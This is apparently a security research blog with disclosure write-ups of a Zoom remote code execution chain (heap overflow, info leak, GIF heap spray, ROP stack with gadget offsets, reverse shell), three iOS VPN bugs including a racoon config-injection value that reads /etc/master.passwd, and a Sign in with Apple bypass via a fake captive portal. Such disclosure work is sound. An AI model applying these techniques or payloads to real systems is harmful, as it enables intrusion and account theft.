      <member fname="SurveyMonkey" lname="" jid="[email protected]" type="1" cmd="/sm" pic_url=" dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF-vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" pic_relative_url=" vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" introduction="Manage SurveyMonkey surveys from your Zoom chat channel." signature="" extension="eyJub3RTaG93IjowLCJjbWRNb2RpZnlUaW1lIjoxNTc4NTg4NjA4NDE5fQ=="/>

The pic_url attribute here is ignored. Instead, the pic_relative_url attribute is used, with "" prepended to it. This means a request is performed to:

"" + image
"" + " vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png"
" vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png"

Because this is not restricted to subdomains of, we could redirect it to a server we control.

We are still not fully sure why this worked, but it worked. This is one of two additional, low impact bugs we used for our attack and which is also currently fixed according to the Zoom Security Bulletin. On its own, this could be used to obtain the external IP address of another user if they are signed in to Zoom, even when you are not a contact.

Setting up a direct connection was very helpful for us, because we had much more control over this connection than over the XMPP connection. The XMPP connection is not direct, but through the server. This meant that invalid XML would not reach us. As the addresses we wanted to leak was unlikely to consist of entirely printable characters, we couldn’t try to get these included in a stanza that would reach us. With a direct connection, we were not restricted in any way.

Our plan was to do the following:

  1. Initiate a HTTPS request using a URL with a query part of 1087 bytes to a server we control.
  2. Accept the connection, but delay responding to the TLS handshake.
  3. Trigger the buffer overflow such that the buffer we overflow is immediately before the block containing the query part of the URL. This overwrites the heap header of the query block, the entire query (including the zero-terminator at the end) and the next heap header.
  4. Let the TLS handshake proceed.
  5. Receive the query, with the heap header and start of the next block in the HTTP request.

This video illustrates how this works:

In essence, this similar to creating an object, overwriting a length field and reading it. Instead of a counter for the length, we overwrite the zero-terminator of a string by writing all the way over the contents of a buffer.

This allowed us to leak data from the start of the next block up to the first null-byte in it. Conveniently, we had also found an interesting object to place there in the source of OpenSSL, libcrypto-1_1.dll to be specific. TLS1_PRF_PKEY_CTX is an object which is used during a TLS handshake to verify a MAC of the transcript during a handshake, to make sure an active attacker has not changed anything during the handshake. This struct starts with a pointer to another structure inside the same DLL (a static structure for a hashing function).

typedef struct {
    /* Digest to use for PRF */
    const EVP_MD *md;
    /* Secret value to use for PRF */
    unsigned char *sec;
    size_t seclen;
    /* Buffer of concatenated seed data */
    unsigned char seed[TLS1_PRF_MAXBUF];
    size_t seedlen;

There is one downside to this object: it is created, used and deallocated within one function call. But luckily, OpenSSL does not clear the full contents of the object, so the pointer at the start remains in the deallocated block:

static void pkey_tls1_prf_cleanup(EVP_PKEY_CTX *ctx)
    TLS1_PRF_PKEY_CTX *kctx = ctx->data;
    OPENSSL_clear_free(kctx->sec, kctx->seclen);
    OPENSSL_cleanse(kctx->seed, kctx->seedlen);

This means that we could leak the pointer we want, but in order to do so we would need to place three objects just right. We needed to place 3 blocks in the right order in a bucket: the block we overflow, the query part of a URL for our initiated HTTPS request and a deallocated TLS1_PRF_PKEY_CTX object. One common way for defeating heap randomization in exploits is to just allocate a lot of objects and try often, but it’s not that simple in this case: we need enough objects and overflows to have a chance of success, but also not too many to still allow deallocated TLS1_PRF_PKEY_CTX objects to remain. If we allocated too many queries, no TLS1_PRF_PKEY_CTX objects would be left. This was a difficult balance to hit.

We tried this a lot and it took days, but eventually we leaked the address once. Then, a few days later, it worked again. And then again the same day. Slowly we were finding the right balance of the number of objects, connections and overflows.

The @z\x15p (0x70157a40) here is the leaked address in libcrypto-1_1.dll:

One thing that greatly increased the chances of success was to use TLS renegotiation. The TLS1_PRF_PKEY_CTX object is created during a handshake, but setting up new connections takes time and does a lot of allocations that could disturb our heap bucket. We found that we could also set up a connection and use TLS renegotiation repeatedly, which meant that the handshake was performed again but nothing else. OpenSSL supports renegotation, and even if you want to renegotiate thousands of times without ever sending a HTTP response this is entirely fine. We ended up creating 3 connections to a webserver that was doing nothing other than constantly renegotiating. This allowed us to create a constant stream of new deallocated TLS1_PRF_PKEY_CTX objects in the deallocated space in the bucket.

The info leak did however remain the most unstable part of our exploit. If you watch the video of our exploit back, then the longest delay will be waiting for the info leak. Vincent from ZDI mentions when the info leak happens during the second attempt. As you can see, the rest of the exploit completes quite quickly after that.

Step 11: Control

The next step was to find an object where we could overwrite a vtable or function pointer. Here, again, we found a useful open source component in a DLL. The file viper.dll contains a copy of the WebRTC library from around 2012. Initially, we found that when a call invite is received (even if it is not answered), viper.dll creates 5 objects of 1064 bytes which all start with a vtable. By searching the WebRTC source code we found that these were FileWrapperImpl objects. These can be seen as adding a C++ API around FILE * pointers from C: methods for writing and reading data, automatic closing and flushing in the destructor, etc. There was one downside: these 5 objects were doing nothing. If we overwrote their vtable in the debugger, nothing would happen until we exited Zoom, only then the destructor would call some vtable functions.

class FileWrapperImpl : public FileWrapper {
  ~FileWrapperImpl() override;

  int FileName(char* file_name_utf8, size_t size) const override;

  bool Open() const override;

  int OpenFile(const char* file_name_utf8,
               bool read_only,
               bool loop = false,
               bool text = false) override;

  int OpenFromFileHandle(FILE* handle,
                         bool manage_file,
                         bool read_only,
                         bool loop = false) override;

  int CloseFile() override;
  int SetMaxFileSize(size_t bytes) override;
  int Flush() override;

  int Read(void* buf, size_t length) override;
  bool Write(const void* buf, size_t length) override;
  int WriteText(const char* format, ...) override;
  int Rewind() override;

  int CloseFileImpl();
  int FlushImpl();

  std::unique_ptr<RWLockWrapper> rw_lock_;

  FILE* id_;
  bool managed_file_handle_;
  bool open_;
  bool looping_;
  bool read_only_;
  size_t max_size_in_bytes_;  // -1 indicates file size limitation is off
  size_t size_in_bytes_;
  char file_name_utf8_[kMaxFileNameSize];

Code execution at exit was far from ideal: this would mean we had just one shot in each attempt. If we had failed to overwrite a vtable we would have no chance to try again. We also did not have a way to remotely trigger a clean exit, but even if we had, the chance we could exit successfully were small. The information leak will have corrupted many objects and heap metadata in the previous phase, which maybe didn’t affect anything yet if those objects are unused, but if we tried to exit could cause a crash due to destructors or freeing.

Based on the WebRTC source code, we noticed the FileWrapperImpl objects are often used in classes related to audio playback. As it happens, the Windows VM Thijs was using at that time did not have an emulated sound card. There was no need for one, as we were not looking at exploiting the actual meeting functionality. Daan suggested to add one, because it could matter for these objects. Thijs was skeptical, but security involves trying a lot of things you don’t expect to work, so he added one. After this, the creation of FileWrapperImpls had indeed changed significantly.

With a emulated sound card, new FileWrapperImpls were created and destroyed regularly while the call was ringing. Each loop of the jingle seemed to trigger a number of allocations and frees of these objects. It is a shame the videos we have of the exploit do not have sound: you would have heard the ringing sound complete a couple of full loops at the moment it exits and calc is started.

This meant we had a vtable pointer we could overwrite quite reliably, but now the question is: what to write there?

Step 12: GIPHY time

We had obtained the offset of libcrypto-1_1.dll using our information leak, but we also needed an address of data under our control: if we overwrite a vtable pointer, then it needs to point to an area containing one or more function pointers. ASLR means we don’t know for sure where our heap allocations end up. To deal with this, we used GIFs.

Hack the planet GIPHY

To send an out-of-meeting message in Zoom, the receiving user has to have previously accepted a connect request or be in a multi-user chat with the attacker. If a user is able to send a message with an image to another user in Zoom, then that image is downloaded and shown automatically if it is below a few megabytes. If it is larger, the user needs to click on it to download it.

In the Zoom chat client, it is also possible to send GIFs from GIPHY. For these images, the file size restriction is not applied and the files are always downloaded and shown. User uploads and GIPHY files are both downloaded from the same domain, but using different paths. By sending an XMPP message for sending a GIPHY, but using path traversal to point it to a user uploaded GIF file instead, we found that we could allow the downloading of arbitrary sized GIF files. If the file is a valid GIF file, then it is loaded into memory. If we send the same link again then it is not downloaded twice, but a new copy is allocated in memory. This is the second low impact vulnerability we used, which is also fixed according to the Zoom Security Bulletin.

A normal GIPHY message:

<message xmlns="jabber:client" to="[email protected]" id="{62BFB8B6-9572-455C-B440-98F532517177}" type="chat" from="[email protected]/ZoomChat_pc">
  <body>John Doe sent you a GIF image. In order to view it, please upgrade to the latest version that supports GIFs:</body>
  <active xmlns=""/>
    <format>%1$@ sent you an image</format>
      <arg>John Doe</arg>
    <from n="John Doe" res="ZoomChat_pc"/>
  <giphyv2 id="YQitE4YNQNahy" url="" tags="hacker">
    <pcInfo url="" size="1456787"/>
    <mobileInfo url="" size="549356"/>
    <bigPicInfo url=" 1aWl62KifvJ_LDECBM1" size="4322534"/>

A GIPHY message with a manipulated path (only the bigPicInfo URL is relevant):

<message xmlns="jabber:client" to="[email protected]" id="{62BFB8B6-9572-455C-B440-98F532517177}" type="chat" from="[email protected]/ZoomChat_pc">
  <body>John Doe sent you a GIF image. In order to view it, please upgrade to the latest version that supports GIFs:</body>
  <active xmlns=""/>
    <format>%1$@ sent you an image</format>
      <arg>John Doe</arg>
    <from n="John Doe" res="ZoomChat_pc"/>
  <giphyv2 id="YQitE4YNQNahy" url="" tags="hacker">
    <pcInfo url="" size="1456787"/>
    <mobileInfo url="" size="549356"/>
    <bigPicInfo url="[file_id]" size="4322534"/>

Our plan was to create a 25 MB GIF file and allocate it multiple times to create a specific address where the data we needed would be placed. Large allocations of this size are randomized when ASLR is used, but these allocations are still page aligned. Because the data we wanted to place was much less than one page, we could just create one page of data and repeat that. This page started with a minimal GIF file, which was enough for the entire file to be considered a valid GIF file. Because Zoom is a 32-bit application, the possible address space is very small. If enough copies of the GIF file are loaded in memory (say, around 512 MB), then we can quite reliably “guess” that a specific address falls inside a GIF file. Due to the page-alignment of these large allocations, we can then use offsets from the page boundary to locate the data we want to refer to.

Step 13: Pivot into ROP

Now we have all the ingredients to call an address in libcrypto-1_1.dll. But to gain arbitrary code execution, we would (probably) need to call multiple functions. For stack buffer overflows in modern software this is commonly achieved using return-oriented programming (ROP). By placing return addresses on the stack to call functions or perform specific register operations, multiple functions can be called sequentially with control over the arguments.

We had a heap buffer overflow, so we could not do anything with the stack just yet. The way we did this is known as a stack pivot: we replaced the address of the stack pointer to point to data we control. We found the following sequence of instructions in libcrypto-1_1.dll:

push edi; # points to vtable pointer (memory we control)
pop esp;  # now the stack pointer points to memory under our control
pop edi;  # pop some extra registers
pop esi; 
pop ebx; 
pop ebp; 

This sequence is misaligned and normally does something else, but for us this could be used to copy an address to data we overwrote (in edi) to the stack pointer. This means that we have replaced the stack with data we wrote with the buffer overflow.

From our ROP chain we wanted to call VirtualProtect to enable the execute bit for our shellcode. However, libcrypto-1_1.dll does not import VirtualProtect, so we don’t have the address for this yet. Raw system calls from 32-bit Windows applications are, apparently, difficult. Therefore, we used the following ROP chain:

  1. Call GetModuleHandleW to get the base address of kernel32.dll.
  2. Call GetProcAddress to get the address of VirtualProtect from kernel32.dll.
  3. Call that address to make the GIF data executable.
  4. Jump to the shellcode offset in the GIF.

In the following animation, you can see how we overwrite the vtable, and then when Close is called the stack is pivoted to our buffer overflow. Due to the extra pop instructions in the stack pivot gadget, some unused values are popped. Then, the ROP chain stats by calling GetModuleHandleW with as argument the string "kernel32.dll" from our GIF file. Finally, when returning from that function a gadget is called that places the result value into ebx. The calling convention in use here means the argument is passed via the stack, before the return address.

In our exploit this results in the following ROP stack (crypto_base points to the load address of libcrypto-1_1.dll we leaked earlier):

# push edi; pop esp; pop edi; pop esi; pop ebx; pop ebp; ret
STACK_PIVOT = crypto_base + 0x441e9

GIF_BASE = 0x462bc020
VTABLE = GIF_BASE + 0x1c # Start of the correct vtable
SHELLCODE = GIF_BASE + 0x7fd # Location of our shellcode
KERNEL32_STR = GIF_BASE + 0x6c  # Location of UTF-16 Kernel32.dll string
VIRTUALPROTECT_STR = GIF_BASE + 0x86 # Location of VirtualProtect string

KNOWN_MAPPED = 0x2fe451e4

JMP_GETMODULEHANDLEW = crypto_base + 0x1c5c36 # jmp GetModuleHandleW
JMP_GETPROCADDRESS = crypto_base + 0x1c5c3c # jmp GetProcAddress

RET = crypto_base + 0xdc28 # ret
POP_RET = crypto_base + 0xdc27 # pop ebp; ret
ADD_ESP_24 = crypto_base + 0x6c42e # add esp, 0x18; ret

PUSH_EAX_STACK = crypto_base + 0xdbaa9 # mov dword ptr [esp + 0x1c], eax; call ebx
POP_EBX = crypto_base + 0x16cfc # pop ebx; ret
JMP_EAX = crypto_base + 0x23370 # jmp eax

rop_stack = [
VTABLE,     # pop edi
GIF_BASE + 0x101f4, # pop esi
GIF_BASE + 0x101f4, # pop ebx
KNOWN_MAPPED + 0x20, # pop ebp

POP_RET, # Not used, padding for other objects
KNOWN_MAPPED + 0x10, # This will be overwritten with the base address of Kernel32.dll
SHELLCODE & 0xfffff000,

And that’s it! We now had a reverse shell and could launch calc.exe.

Reliability, reliability, reliability

The last week before the contest was focused on getting it to an acceptable reliability level. As we mentioned in the info leak, this phase was very tricky. It took a lot of time to get it to having even a tiny chance to succeed. We had to overwrite a lot of data here, but the application had to remain stable enough that we could still perform the second phase without crashing.

There were a lot of things we did to improve the reliability and many more we tried and gave up. These can be summarized in two categories: decreasing the chance that we overwrote something we shouldn’t and decreasing the chance that the client would crash when we had overwritten something we didn’t intend to.

In the second phase, it could happen that we overwrote the vtable of a different object. Whenever we had a crash like this, we would try to fix it by placing a compatible no-op function on the corresponding place in the vtable. This is harder than it sounds on 32-bit Windows, because there are multiple calling conventions involved and some require the RET instruction to pop the arguments from the stack, which means that we needed a no-op that pops the right number of values.

In the first phase, we also had a chance of overwriting pointers in objects in the same size range. We could not yet deal with function pointers or vtables as we had no info leak, but we could place pointers to readable/writable memory. We started our exploit by uploading some GIF files to create known addresses with controlled data before this phase so we could use those addresses in the data we used for the overflow. Of course, the data in the GIF files could again be dereferenced as a pointer, requiring multiple layers of fake addresses.

What may not yet be clear is that each attempt required a slow manual process. Each time we wanted to run our exploit, we would launch the client, clear all chat messages for the victim, exit the client and launch it again. Because the memory layout was so important, we had to make sure we started from an identical state each time. We had not automated this, because we were paranoid about ensuring the client would be used in exactly the same way as during the contest. Anything we did differently could influence the heap layout. For example, we noticed that adding network interception could have some effect on how network requests were allocated, changing the heap layout. Our attempts were often close to 5 minutes, so even just doing 10 attempts took an hour. To assess if a change improved the reliability, 10 runs was pretty low.

Both the info leak and the vtable overwrite phase run in loops. If we were lucky, we had success in the first iteration of the loop, but it could go on for a long time. To improve our chance of success in the time limit, our exploit would slowly increase the risk it took the more iterations it needed. In the first iteration we would only overflow a small number of times and only one object, but this would increase to more and more overflows with larger sizes the longer it took.

In the second phase we could take more risks. The application did not need to remain stable enough for another phase and we only needed two adjacent allocations, not also a third unallocated block. By overwriting 10 blocks further, we had a very good chance of hitting the needed object with just one or two iterations.

In the end, we estimated that our exploit had about a 50% chance of success in the 5 minutes. If, on the other hand, we could leak the address of libcrypto-1_1.ddl in one run and then skip the info leak in the next run (the locations of ASLR randomized dlls remain the same on Windows for some time), we could increase our reliability to around 75%. ZDI informed us during the contest that this would result in a partial win, but it never got to the point where we could do that. The first attempt failed in the first phase.


After we handed in our final exploit the nerve-wracking process of waiting started. Since we needed to hand in our final exploit two days before the event and the organizers would not run our exploit until our attempt, it was out of our hands. Even during the attempts we could not see the attacker’s screen, for example, so we had no idea if everything worked as planned. The enormous relief when calc.exe popped up made it worth it in the end.

In total we spend around 1.5 weeks from the start of our research until we had the main vulnerability of our exploit. Writing and testing the exploit itself took another 1.5 months, including the time we needed to read up on all Windows internals we needed for our exploit.

We would like to thank ZDI and Zoom for organizing this year’s event, and hopefully see you guys next year!

iOS VPN support: 3 different bugs

7 October 2020 at 00:00

Since iOS version 8, support has been present for third-party apps to implement Network Extensions. Network Extensions can be a variety of things that can all inspect or modify network traffic in some way, like ad-blockers and VPNs.

For VPNs there are actually three variants that a Network Extension can implement: a “Personal VPN”, where the app supplies only a configuration for a built-in VPN type (IPsec), or the app can implement the code for the VPN itself, either as “Packet Tunnel Provider” or “App Proxy Provider”. we did not spend any time on the latter two, but only investigated Personal VPNs.

To install a VPN Network Extension, the user needs to approve it. This is a little different from other permission prompts in iOS: the user needs to approve it and then also enter their passcode. This makes sense because a VPN can be very invasive, so users must be aware of the installation. If the user uninstalls the app, then any Personal VPN configurations it added are also automatically removed.

Bug 1: App spoofing

To request the addition of a new VPN configuration, the app sends a request to the nehelper daemon using an NSXPCConnection. NSXPCConnection is a high-level API built on XPC that can be used to call specific Objective-C methods between processes. Arguments that are passed to the method are serialized using NSSecureCoding. The object representing the configuration of a Network Extension is an object of the class NEConfiguration. As can be seen from the following class dump of NEConfiguration, the name (_applicationName) and app bundle identifier (_application) of the app which created the request are included in this object:

@interface NEConfiguration : NSObject <NEConfigurationValidating,
			NEProfilePayloadHandlerDelegate, NSCopying, NSSecureCoding> {
    NEVPN * _VPN;
    NEAOVPN * _alwaysOnVPN;
    NEVPNApp * _appVPN;
    NSString * _application;
    NSString * _applicationIdentifier;
    NSString * _applicationName;
    NEContentFilter * _contentFilter;
    NSString * _externalIdentifier;
    long long  _grade;
    NSUUID * _identifier;
    NSString * _name;
    NEPathController * _pathController;
    NEProfileIngestionPayloadInfo * _payloadInfo;

It turns out that the permission prompt used that name, instead of the actual name of the app that the user would be familiar with. Because that is part of an object received from the app, this means that it could present the name of an entirely different app, for example one the user might be more inclined to trust as a VPN provider. Because it is even possible to add newlines in this value, a malicious app could even attempt to obfuscate what the prompt is actually asking. For example, making it seem like a prompt about installing a software update (where users would expect to enter their passcode).

It is also possible to change the app bundle identifier to something else. By doing this, the VPN configuration is no longer automatically removed when the user uninstalls the app. Therefore, the configuration persists even when the user thinks they removed it by removing the app.

So, by calling these private methods:

NEVPNManager *manager = [NEVPNManager sharedManager];
NEConfiguration *configuration = [manager configuration];

[configuration setApplication:nil];
[configuration setApplicationName:@"New Network Settings for 4G"];

[manager saveToPreferencesWithCompletionHandler:^(NSError *error) {

This results in the following permission prompt:

And this configuration is not automatically removed when uninstalling the app.

Apple fixed this issue in the iOS 14 update.

Bug 2: Configuration file injection (CVE-2020-9836)

IPsec VPNs are handled on iOS by racoon, an IPsec implementation that is part of the open source project ipsec-tools. Note that the upstream project for this was abandoned in 2014:

Important Note

The development of ipsec-tools has been ABANDONED.

ipsec-tools has security issues, and you should not use it. Please switch to a secure alternative!

Whenever an IPsec VPN is asked to connect, the system generates a new racoon configuration file, places it in /var/run/racoon/ and tells racoon to reload its configuration. This happens no matter where the VPN configuration came from: a manually added VPN, Personal VPN Network Extension app or a VPN configuration from a .mobileconfig profile.

While playing around with the configuration options, we noticed a strange error whenever we included a " character in the “Group name” or “Account Name” values. As it turns out, these values are copied literally to the configuration file without any escaping. Because the string itself was enclosed in quotes, this resulted in a syntax error. By using ";, it was possible to add new racoon configuration options.

Racoon supports many more configuration options than what is available via the UI, a Personal VPN API or a .mobileconfig file. Some of those could have an effect that should not be allowed for an app, even though it may be approved as a Network Extension. If you check the man page, you might notice script as an interesting option. Sadly, this is not included in the build on iOS.

One interesting option that did work was the following:

A"; my_identifier keyid file "/etc/master.passwd

This results in the following line in the configuration file:

	my_identifier keyid_use "A"; my_identifier keyid file "/etc/master.passwd";

This second option tells racoon to read its group name from the file /etc/master.passwd, which overrides the previous option. Using this as a group name would cause the contents of /etc/master.passwd to be included in the initial IPsec packet:

Of course, on iOS the /etc/master.passwd file is not sensitive as it is always the same, but there are various system locations that racoon is allowed to read from due to its sandbox configuration:

  • /var/root/Library/
  • /private/etc/
  • /Library/Preferences/

There is, however, an important limitation. The group name is added to the initial handshake message. This packet is sent over UDP, therefore, the entire packet can be at most 65,535 bytes. The group name value is not truncated, so any files larger than 65,535 bytes, subtracting the overhead for the rest of the packet, IP and UDP header, can not be read.

For example, following files were found to often be below the limit and may sensitive information that would normally not be available to an app:

  • /Library/Preferences/SystemConfiguration/
  • /private/var/root/Library/Lockdown/data_ark.plist

By exploiting this issue, a Network Extension app could read from files that would normally not be allowed due to the app sandbox. Other potential impact could be accessing Keychain items or deleting files on those directories by changing the pid file location.

Apple initially indicated that they planned to release a fix in iOS 13.5, but we found no changes in that version. Then, they applied a fix in iOS 13.6 beta 2 that attempted to filter out racoon options from these fields, which was easily bypassed by replacing the spaces in the example with tabs. Finally, in the release of iOS 13.6 this was actually fixed. Sadly, due to this back and forth, Apple seems to have forgotten to include it in their changelog, even after multiple reminders.

Bug 3: OOB reads (CVE-2020-9837)

As mentioned, the upstream project for racoon is abandoned and it indicates that it contains known security issues. Apple has patched quite a few vulnerabilities in racoon over the years (in the iOS 5 era even being used for a jailbreak), but likely because there is no upstream project, these fixes were often not correct or incomplete. In particular, we noticed that some bounds checks Apple added were off by a small amount.

A common pattern in racoon for parsing packets containing a list of elements is to do the following. The start of the list is cast to a struct with the same representation as the element header (d). A variable keeps track of the remaining length of the buffer (tlen). Then, a loop is started. In each iteration, it handles the current element. Then it advances the struct to the next value and it decreases the number of remaining bytes with the size of the current element. If that number becomes negative or zero, the loop ends.

For example, ipsec_doi.c:534-772:

 * get ISAKMP data attributes
static int
t2isakmpsa(trns, sa)
	struct isakmp_pl_t *trns;
	struct isakmpsa *sa;
	struct isakmp_data *d, *prev;
	int flag, type;
	int error = -1;
	int life_t;
	int keylen = 0;
	vchar_t *val = NULL;
	int len, tlen;
	u_char *p;

	tlen = ntohs(trns->h.len) - sizeof(*trns);
	prev = (struct isakmp_data *)NULL;
	d = (struct isakmp_data *)(trns + 1);

	/* default */
	sa->lifebyte = 0;
	sa->dhgrp = racoon_calloc(1, sizeof(struct dhgroup));
	if (!sa->dhgrp)
		goto err;

	while (tlen > 0) {

		type = ntohs(d->type) & ~ISAKMP_GEN_MASK;
		flag = ntohs(d->type) & ISAKMP_GEN_MASK;

			"type=%s, flag=0x%04x, lorv=%s\n",
			s_oakley_attr(type), flag,
			s_oakley_attr_v(type, ntohs(d->lorv)));

		/* get variable-sized item */
		switch (type) {
			if (flag) {	/*TV*/
				len = 2;
				p = (u_char *)&d->lorv;
			} else {	/*TLV*/
				len = ntohs(d->lorv);
				if (len > tlen) {
						 "invalid ISAKMP-SA attr, attr-len %d, overall-len %d\n",
						 len, tlen);
					return -1;
				p = (u_char *)(d + 1);
			val = vmalloc(len);
			if (!val)
				return -1;
			memcpy(val->v, p, len);


		switch (type) {
			sa->enctype = (u_int16_t)ntohs(d->lorv);

			sa->hashtype = (u_int16_t)ntohs(d->lorv);

			sa->authmethod = ntohs(d->lorv);

			sa->dh_group = (u_int16_t)ntohs(d->lorv);

			int type = (int)ntohs(d->lorv);
				sa->dhgrp->type = type;
				return -1;
			sa->dhgrp->prime = val;

			if (!flag)
				sa->dhgrp->gen1 = ntohs(d->lorv);
			else {
				int len = ntohs(d->lorv);
				sa->dhgrp->gen1 = 0;
				if (len > 4)
					return -1;
				memcpy(&sa->dhgrp->gen1, d + 1, len);
				sa->dhgrp->gen1 = ntohl(sa->dhgrp->gen1);

			if (!flag)
				sa->dhgrp->gen2 = ntohs(d->lorv);
			else {
				int len = ntohs(d->lorv);
				sa->dhgrp->gen2 = 0;
				if (len > 4)
					return -1;
				memcpy(&sa->dhgrp->gen2, d + 1, len);
				sa->dhgrp->gen2 = ntohl(sa->dhgrp->gen2);

			sa->dhgrp->curve_a = val;

			sa->dhgrp->curve_b = val;

			int type = (int)ntohs(d->lorv);
			switch (type) {
				life_t = type;
			if (!prev
			 || (ntohs(prev->type) & ~ISAKMP_GEN_MASK) !=
				    "life duration must follow ltype\n");

			switch (life_t) {
				sa->lifetime = ipsecdoi_set_ld(val);
				if (sa->lifetime == 0) {
						"invalid life duration.\n");
					goto err;
				sa->lifebyte = ipsecdoi_set_ld(val);
				if (sa->lifebyte == 0) {
						"invalid life duration.\n");
					goto err;
					"invalid life type: %d\n", life_t);
				goto err;

			int len = ntohs(d->lorv);
			if (len % 8 != 0) {
					"keylen %d: not multiple of 8\n",
				goto err;
			sa->encklen = (u_int16_t)len;
			/* unsupported */

			sa->dhgrp->order = val;


		prev = d;
		if (flag) {
			tlen -= sizeof(*d);
			d = (struct isakmp_data *)((char *)d + sizeof(*d));
		} else {
			tlen -= (sizeof(*d) + ntohs(d->lorv));
			d = (struct isakmp_data *)((char *)d + sizeof(*d) + ntohs(d->lorv));

	/* key length must not be specified on some algorithms */
	if (keylen) {
		if (sa->enctype == OAKLEY_ATTR_ENC_ALG_DES
		 || sa->enctype == OAKLEY_ATTR_ENC_ALG_3DES) {
				"keylen must not be specified "
				"for encryption algorithm %d\n",
			return -1;

	return 0;
	return error;

In 9 places in the code this pattern was used without a check at the start of the loop body that the remainder of the list contained at least the number of bytes that the header is long, nor was there a check that after the parsing the number of remaining bytes was exactly 0. This means that for the last iteration of the loop, the struct may contain fields that are filled with data past the end of the buffer.

In some cases where variable length elements are used, the check if the buffer had enough data for the variable length part was also slightly off, also due to failing to take into account the length of the header of the current packet. In the example above, on line 587 the code checks that len > tlen, but this fails to take into account the fact that the size of the header the element has not yet been subtracted from tlen (as can be seen at line 753).

The end result was that in many places where packets are being parsed it was possible to read a couple of additional bytes from the buffer as if they are part of the packet. In many cases, it was possible to observe information about those bytes externally. For example, depending on the element type, the connection might be aborted if an OOB byte was 0x00.

These were fixed by Apple in iOS 13.5 (CVE-2020-9837).


VPNs are intended to offer security for users on an untrusted network. However, with the introduction of Network Extensions, the OS now also needs to protect itself against a potentially malicious VPN app. Properly securing an existing feature for such a new context is difficult. This is even more difficult due to the use of an existing, but abandoned, project. The way racoon is written, C code with complicated pointer arithmetic, makes spotting these bugs very difficult. It is very likely that more memory corruption bugs can be found in it.

Sign in with Apple - authentication bypass

1 July 2020 at 00:00

A couple of weeks ago we found a vulnerability that could be used to gain unauthorized access to an iCloud account, by abusing a new feature allowing TouchID to log in to websites.

In iOS 13 and macOS 10.15, Apple added the possibility to sign in on Apple’s own sites using TouchID/FaceID in Safari on devices which include the required biometric hardware.

When you visit any page with a login form for an Apple-account, a prompt is shown to authenticate using TouchID instead. If you authenticate, you’re immediately logged in. This skips the 2-factor authentication step you would normally need to perform when logging in with your password. This makes sense because the process can be considered to already require two factors: your biometrics and the device. You can cancel the prompt to log in normally, for example if you want to use a different AppleID than the one signed in on the phone.

We expect that the primary use-case of this feature is not for signing in on iCloud (as it is pretty rare to use in Safari on a phone), but we expect that the main motivator was for “Sign in with Apple” on the web, for which this feature works as well. For those sites additional options are shown when creating a new account, for example whether to hide your email address.

Although all of this works in both macOS and iOS, with TouchID and FaceID and for all sites using AppleID logins, we’ll use iOS, TouchID and to explain the vulnerability, but keep in mind that the impact is more broad.

Logging in on Apple domains happens using OAuth2. On, this uses the web_message mode. This works as follows when doing a normal login:

  1. embeds an iframe pointing to & &response_type=code.
  2. The user logs in (including steps such as entering a 2FA-token) inside the iframe.
  3. If the authentication succeeds, the iframe posts a message back to the parent window with a grant_code for the user using window.parent.postMessage(<token>, "") in JavaScript.
  4. The grant_code is used by the page to continue the login process.

Two of the parameters are very important in the iframe URL: the client_id and redirect_uri. The server keeps track of a list of registered clients and the redirect URIs that are allowed for each client. In the case of the web_message flow, the redirect URI is not used as a real redirect, but instead it is used as the required page origin of the posted message with the grant code (the second argument for postMessage).

For all OAuth2 modes, it is very important that the authentication server validates the redirect URI correctly. If it does not do that, then the user’s grant_code could be sent to a malicious webpage instead. When logging in on the website, performs that check correctly: changing the redirect_uri to anything else results in an error page.

When the user authenticates using TouchID, the iframe is handled differently, but the outer page remains the same. When Safari detects a new page with a URL matching the example URL above, it does not download the page, but it invokes the process AKAppSSOExtension instead. This process communicates with the AuthKit daemon (akd) to handle the biometric authentication and to retrieve a grant_code. If the user successfully authenticates then Safari injects a fake response to the pending iframe request which posts the message back, in the same way that the normal page would do if the authentication had succeeded. akd communicates with an API on, to which it sends the details of the request and from which it receives a grant_code.

What we found was that the API had a bug: even though the client_id and redirect_uri were included in the data submitted to it by akd, it did not check that the redirect URI matches the client ID. Instead, there was only a whitelist applied by AKAppSSOExtension on the domains. All domains ending with, and were allowed. That may sound secure enough, but keep in mind that has hundreds (if not thousands) of subdomains. If any of these subdomains can somehow be tricked into running malicious JavaScript then they could be used to trigger the prompt for a login with the iCloud client_id, allowing that script to retrieve the user’s grant code if they authenticate. Then the page can send it back to an attacker which can use it to obtain a session on

Some examples of how that could happen:

  • A cross-site scripting vulnerability on any subdomain. These are found quite regularly, lists at least 30 candidates from 2019, and that just covers the domains that are important enough to investigate.
  • A dangling subdomain that can be taken over by an attacker. While we are not aware of any instances of this happening to Apple, recently someone found 670 subdomains of available for takeover:
  • A user visiting a page on any subdomain over HTTP. The important subdomains will have a HSTS header, but many will not. The domain is not HSTS preloaded with includeSubdomains.

The first two require the attacker to trick users into visiting the malicious page. The third requires that the attacker has access to the user’s local network. While such an attack is in general harder, it does allow a very interesting example: When an Apple device connects to a wifi-network, it will try to access If the response does not match the usual response, then the system assumes there is a captive portal where the user will need to do something first. To allow the user to do that, the response page is opened and shown. Usually, this redirects the user to another page where they need to login, accept terms and conditions, pay, etc. However, it does not need to do that. Instead, the page could embed JavaScript which triggers the TouchID login, which will be allowed as it is on an subdomain. If the user authenticates, then the malicious JavaScript receives the user’s grant_code.

The page could include all sorts of content to make the user more likely to authenticate, for example by making the page look like it is part of iOS itself or a “Sign in with Apple” button. “Sign in with Apple” is still pretty new, so user’s might not notice that the prompt is slightly different than usual. Besides, many users will probably automatically authenticate when they see a TouchID prompt as those are almost always about them authenticating to the phone, the fact that users should also determine if they want to authenticate to the page which opened the prompt is not made obvious.

By setting up a fake hotspot in a location where users expect to receive a captive portal (for example at an airport, hotel or train station), it would have been possible to gain access to a significant number of iCloud accounts, which would have allowed access to backups of pictures, location of the phone, files and much more. As I mentioned, this also bypasses the normal 2FA approve + 6-digit code step.

We reported this vulnerability to Apple, and they fixed it the same day they triaged it. The API now correctly checks that the redirect_uri matches the client_id. Therefore, this could be fixed entirely server-side.

